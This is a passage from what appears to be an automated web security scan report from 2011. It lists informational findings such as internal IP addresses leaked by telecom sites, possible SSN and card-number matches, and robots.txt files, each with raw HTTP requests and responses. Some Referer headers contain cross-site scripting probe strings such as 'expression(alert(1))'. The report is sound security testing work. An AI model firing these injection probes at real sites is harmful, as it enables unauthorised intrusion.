Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.71. http://www.fairpoint.com/scripts/script.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /scripts/script.js HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Accept-Ranges: bytes
ETag: W/"87706-1314616102000"
Last-Modified: Mon, 29 Aug 2011 11:08:22 GMT
Content-Length: 87706
Content-Type: text/javascript

var imagepath_prefix = "/static";
//var serverURL="http://216.227.79.66";
var serverURL="http://" + location.host;
//var googleServiceTarget="http://209.105.163.13/search?q=$$$&btnG=Search&sort=dat
...[SNIP]...
http://209.105.163.13/search?q=$$$&btnG=Search&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=TG_CMS&proxystylesheet=TG_CMS&site=fairpoint_test";

var googleServiceTarget2="http://172.24.69.18/search?q=$$$&btnG=Search&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=default_frontend&proxystylesheet=telco_frontend&site=@@@";
var indexedLocation = [];
indexedLocation[1] = "
...[SNIP]...

19.72. http://www.frontier.com/Js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Js/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/s_code.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; expires=Thu, 6-Sep-2012 11:50:33 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:37 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

19.73. http://www.frontierhelp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; expires=Thu, 6-Sep-2012 12:45:15 GMT; path=/
Connection: close
Date: Tue, 06 Sep 2011 12:45:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2324395;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
Set-Cookie: CFTOKEN=20838155;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
location: /frontiercare
Content-Type: text/html; charset=UTF-8


19.74. http://www.frontierpages.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://yp.frontierpages.com/results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57%22style%3d%22x%3aexpression(alert(1))%22d9518141ec5&city=Dallas&state=TX&zip=

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da947bCMYKY; expires=Thu, 6-Sep-2012 12:56:23 GMT; path=/
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:56:30 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...

19.75. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.202-->
...[SNIP]...

19.76. http://www.vonage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.196-->
...[SNIP]...

19.77. http://www.vonage.com/googlesearch/cluster.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/cluster.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /googlesearch/cluster.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Thu, 25 Sep 2008 20:21:35 GMT
ETag: "a54bb2-14b2-457be25b711c0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: application/javascript

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

// Modified to support XML response from GSA
// 2008-03-27
// bdanbury@vonage.com

/**
* @fileoverview
*
* This file is f
...[SNIP]...
put=xml_no_dtd&sort=date%3AD%3AL%3Ad1&
* ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1&
* site=default_collection&oe=UTF-8&proxystylesheet=f7&
* ip=172.18.68.100"
*
* @param {Function} render: The rendering function which is called on
* completion with 2 arguments, the search URL (the arg above) and the XML
* that comes back from the CS.
*
*/
f
...[SNIP]...

19.78. http://www.vonage.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.202-->
...[SNIP]...

19.79. http://www.whitefence.com/static/Seymour.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /static/Seymour.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/Seymour.js HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4
If-None-Match: "2b8556-49fd-4ca50d35"
If-Modified-Since: Thu, 30 Sep 2010 22:20:37 GMT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:56 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:51:56 GMT
Last-Modified: Thu, 30 Sep 2010 22:20:37 GMT
ETag: "192a56-49fd-4ca50d35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 18941

/*
   Package: Seymour
       Revision $Id: Seymour.js 10919 2010-01-29 16:25:17Z evan $

       Native javascript client-side frontend for Skinner webservice. It uses no specific frameworks,
       and should be com
...[SNIP]...
seconds) allowed for a callback response, defaults to 5 seconds
       timeOut: 5000,
       // skinner web service to which all requests are sent, defaults to the load-balanced production instance.
       //url: '//10.0.0.139/cgi-bin/skinner.dll', // build-test skinner (on Tennessee)
       url: '//www.whitefence.com/scripts/server/skinner.php', // external skinner
//url: '//www.whitefence.com/cgi-bin/skinner.dl
...[SNIP]...

20. Social security numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/asset/coreuiConcatMin.js

Issue detail

The following social security numbers were disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /tool/2011.09.01.19.07/asset/coreuiConcatMin.js HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:03 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
Last-Modified: Fri, 02 Sep 2011 00:23:32 GMT
Content-Length: 610876

var Base=function(){};
Base.extend=function(_instance,_static){var extend=Base.prototype.extend;
Base._prototyping=true;
var proto=new this;
extend.call(proto,_instance);
delete Base._prototyping;
var
...[SNIP]...
\.\d{1,3})? *%?$/;
if(value>0&&numRegex.test(value)){return(value)
}},null,"checkPercentage");
oh.utils.validators.checkSSN=new oh.Validator(function(value){var badSSNcounter=0;
var badSSNs=new Array("111-11-1111","111-11-1111","111111111","222-22-2222","222222222","333-33-3333","333333333","444-44-4444","444444444","555-55-5555","555555555","666-66-6666","666666666","777-77-7777","777777777","888-88-8888","888888888","999-99-9999","999999999","000-00-0000","000000000","123-45-6789","123456789","987-65-4321","987654321");
for(i=0;
i<badSSNs.length;
i++){if(badSSNs[i]==value){badSSNcounter++
}}if(badSSNcounter==0){return value
}},null,"checkSSN");
oh.utils.validators.validDateAtL
...[SNIP]...

21. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/myfitv.com/z300x250

Issue detail

The following credit card number was disclosed in the response:

Request

GET /adj/myfitv.com/z300x250;sz=300x250;qcseg=D;qcseg=T;ord=6532909198404564? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Tue, 06 Sep 2011 12:55:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 5379
X-XSS-Protection: 1; mode=block

function googleAdSlot(id, contents) {this.id_ = id;this.contents_ = contents;this.loaded_ = false;}function addAdSenseContent(w, slot_id, content) {var params_map = w['google_slot_contents'] ||(w['goo
...[SNIP]...
3e\x3cbody leftMargin\x3d\x220\x22 topMargin\x3d\x220\x22 marginwidth\x3d\x220\x22 marginheight\x3d\x220\x22\x3e\x3cscript type\x3d\x22text/javascript\x22 src\x3d\x22http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0?mpt\x3d2134103751\x26mpvc\x3dhttp://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAw
...[SNIP]...

21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:55 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 9678
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
A6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=2134103751\" target=\"_blank\">
...[SNIP]...

21.3. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search;_ylt=Ajuek99xQM0_yZ.DABRjfVXSrYZ4?p=xss&fr=ush-sports HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 35648

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst2.ec.yimg.com/ec/fd/ls/l?IG=4a06753073d74d7bba4e661638f5b66
...[SNIP]...
<a href="/r/_ylt=A0oGdSM4FmZOumQALEpXNyoA/SIG=17uup1k9g/EXP=1315342008/**http%3a//74.6.117.48/search/srpcache%3fei=UTF-8%26p=xss%26fr=ush-sports%26u=http%3a//cc.bingj.com/cache.aspx%3fq=xss%26d=5006776799396518%26mkt=en-US%26setlang=en-US%26w=f93bddf,445ecc43%26icp=1%26.intl=us%26sig=Ii.Q59SNBGV5tSu9TaCbrw--" data-bk="5087.1">
...[SNIP]...

22. Robots.txt file  previous  next
There are 100 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://533-rgz-601.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 533-rgz-601.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "a18024-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.2. http://a.adready.com/campaign_event/impression  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.adready.com
Path:   /campaign_event/impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.adready.com

Response

HTTP/1.0 200 OK
Status: 200 OK
Last-Modified: Thu, 18 Aug 2011 02:03:07 GMT
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:45:38 GMT
Content-Length: 1022
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /session/
Disallow: /ABC/
Disallow: /images/ # hides .swfs with indexable t
...[SNIP]...

22.3. http://a.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Tue, 21 Jun 2011 13:20:59 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

